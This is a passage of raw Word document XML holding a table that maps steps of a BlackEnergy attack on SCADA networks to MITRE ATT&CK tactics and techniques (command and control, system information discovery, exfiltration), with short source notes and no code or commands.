          <w:p w14:paraId="59CD0E05" w14:textId="7F772CA8" w:rsidR="0024244B" w:rsidRPr="0062544E" w:rsidRDefault="00947702" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="708" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="533A1647" w14:textId="77777777" w:rsidR="0024244B" w:rsidRPr="0062544E" w:rsidRDefault="0024244B" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D3AC69D" w14:textId="709C3B14" w:rsidR="0024244B" w:rsidRPr="0062544E" w:rsidRDefault="00947702" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00947702">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A9FBB45" w14:textId="2CD8CDB2" w:rsidR="0024244B" w:rsidRPr="0062544E" w:rsidRDefault="00E32B30" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>A</w:t>
            </w:r>
            <w:r w:rsidR="00D77C34">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>O</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>-EXF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4365" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4CE01DA8" w14:textId="1D9A6C9B" w:rsidR="0024244B" w:rsidRPr="00DD4A99" w:rsidRDefault="00DD4A99" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[1] credentials must have been exfiltrated in some form as stated that they are used to access the SCADA networks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00947702" w:rsidRPr="0062544E" w14:paraId="08F4FEBF" w14:textId="77777777" w:rsidTr="00947702">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3143C981" w14:textId="39DD956B" w:rsidR="00947702" w:rsidRPr="0062544E" w:rsidRDefault="00947702" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10962FCF" w14:textId="05633985" w:rsidR="00947702" w:rsidRPr="0062544E" w:rsidRDefault="00947702" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A5536D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00A5536D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0011 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00A5536D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Comman</w:t>
            </w:r>
            <w:r w:rsidRPr="00A5536D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>d and Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6CB4D8C9" w14:textId="3B9C1B28" w:rsidR="00947702" w:rsidRPr="0062544E" w:rsidRDefault="00947702" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>T1071.001 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Application </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Layer Protocol: Web Protocols</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="709" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70ED86E3" w14:textId="288B5D4E" w:rsidR="00947702" w:rsidRDefault="00947702" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="708" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="635C93A5" w14:textId="77777777" w:rsidR="00947702" w:rsidRPr="0062544E" w:rsidRDefault="00947702" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="71991168" w14:textId="38F6D98D" w:rsidR="00947702" w:rsidRDefault="00947702" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00947702">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="183DB546" w14:textId="510719AE" w:rsidR="00947702" w:rsidRPr="0062544E" w:rsidRDefault="00E32B30" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E32B30">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4365" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="126006E3" w14:textId="4495C96A" w:rsidR="00947702" w:rsidRPr="0062544E" w:rsidRDefault="00947702" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00947702">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[9] Noted in ATT&amp;CK </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00947702">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>BlackEnergy</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00947702">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00947702" w:rsidRPr="0062544E" w14:paraId="6B4B576F" w14:textId="77777777" w:rsidTr="00947702">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02C11D81" w14:textId="17B0EB6F" w:rsidR="00947702" w:rsidRPr="0062544E" w:rsidRDefault="00947702" w:rsidP="009672B0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="459592B0" w14:textId="12BADED4" w:rsidR="00947702" w:rsidRPr="0062544E" w:rsidRDefault="00947702" w:rsidP="009672B0">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000</w:t>
            </w:r>
            <w:r w:rsidR="00947D5E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidRPr="0062544E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0062544E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00947D5E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="162945F4" w14:textId="0C50F4AD" w:rsidR="00947702" w:rsidRPr="0062544E" w:rsidRDefault="00947702" w:rsidP="009672B0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0062544E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T10</w:t>
            </w:r>
            <w:r w:rsidR="00947D5E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>82</w:t>
            </w:r>
            <w:r w:rsidRPr="0062544E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00947D5E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>System Information Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="709" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="486D6E38" w14:textId="17B89706" w:rsidR="00947702" w:rsidRPr="0062544E" w:rsidRDefault="00FA713A" w:rsidP="009672B0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="708" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="292A263F" w14:textId="77777777" w:rsidR="00947702" w:rsidRPr="0062544E" w:rsidRDefault="00947702" w:rsidP="009672B0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="510A18CD" w14:textId="77777777" w:rsidR="00947702" w:rsidRPr="0062544E" w:rsidRDefault="00947702" w:rsidP="009672B0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B66491E" w14:textId="6729B77B" w:rsidR="00947702" w:rsidRPr="0062544E" w:rsidRDefault="00E32B30" w:rsidP="009672B0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-DIS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4365" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E0FB2CD" w14:textId="2D1501DE" w:rsidR="00947702" w:rsidRPr="0062544E" w:rsidRDefault="00CB3651" w:rsidP="009672B0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[8] </w:t>
            </w:r>
            <w:r w:rsidR="00947D5E" w:rsidRPr="00947702">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[9] Noted in ATT&amp;CK </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00947D5E" w:rsidRPr="00947702">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>BlackEnergy</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00947D5E" w:rsidRPr="00947702">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00947702" w:rsidRPr="0062544E" w14:paraId="188D0CD8" w14:textId="77777777" w:rsidTr="00947702">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44662BFE" w14:textId="590B5E56" w:rsidR="00947702" w:rsidRPr="0062544E" w:rsidRDefault="00947702" w:rsidP="009672B0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1EB2940E" w14:textId="77777777" w:rsidR="00947702" w:rsidRPr="0062544E" w:rsidRDefault="00947702" w:rsidP="009672B0">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0010 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0062544E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43E69C53" w14:textId="77777777" w:rsidR="00947702" w:rsidRPr="0062544E" w:rsidRDefault="00947702" w:rsidP="009672B0">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0062544E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0062544E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1041 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0062544E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Exfiltration Over C2 Channel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="709" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="010801AF" w14:textId="0580B3D6" w:rsidR="00947702" w:rsidRPr="0062544E" w:rsidRDefault="00FA713A" w:rsidP="009672B0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="708" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B354EC6" w14:textId="77777777" w:rsidR="00947702" w:rsidRPr="0062544E" w:rsidRDefault="00947702" w:rsidP="009672B0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="371BBE40" w14:textId="77777777" w:rsidR="00947702" w:rsidRPr="0062544E" w:rsidRDefault="00947702" w:rsidP="009672B0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00947702">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E5E64B2" w14:textId="0B657268" w:rsidR="00947702" w:rsidRPr="0062544E" w:rsidRDefault="00E32B30" w:rsidP="009672B0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>A</w:t>
            </w:r>
            <w:r w:rsidR="00D77C34">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>O</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>-EXF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4365" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4649CEBD" w14:textId="1FCFDD46" w:rsidR="00947702" w:rsidRPr="00DD4A99" w:rsidRDefault="00947702" w:rsidP="009672B0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidR="00947D5E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>System info exfiltrated</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E42795" w:rsidRPr="0062544E" w14:paraId="5F8D410E" w14:textId="77777777" w:rsidTr="009672B0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76001B8C" w14:textId="238837C9" w:rsidR="00E42795" w:rsidRPr="0062544E" w:rsidRDefault="00FA713A" w:rsidP="009672B0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D2DC2B7" w14:textId="77777777" w:rsidR="00E42795" w:rsidRPr="0062544E" w:rsidRDefault="00E42795" w:rsidP="009672B0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A5536D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00A5536D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0011 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00A5536D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Command and Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5F93E63B" w14:textId="77777777" w:rsidR="00E42795" w:rsidRPr="0062544E" w:rsidRDefault="00E42795" w:rsidP="009672B0">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1071.001 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Application Layer Protocol: Web Protocols</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="709" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="47F45A19" w14:textId="00B0CA34" w:rsidR="00E42795" w:rsidRDefault="00FA713A" w:rsidP="009672B0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="708" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="043143CF" w14:textId="77777777" w:rsidR="00E42795" w:rsidRPr="0062544E" w:rsidRDefault="00E42795" w:rsidP="009672B0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
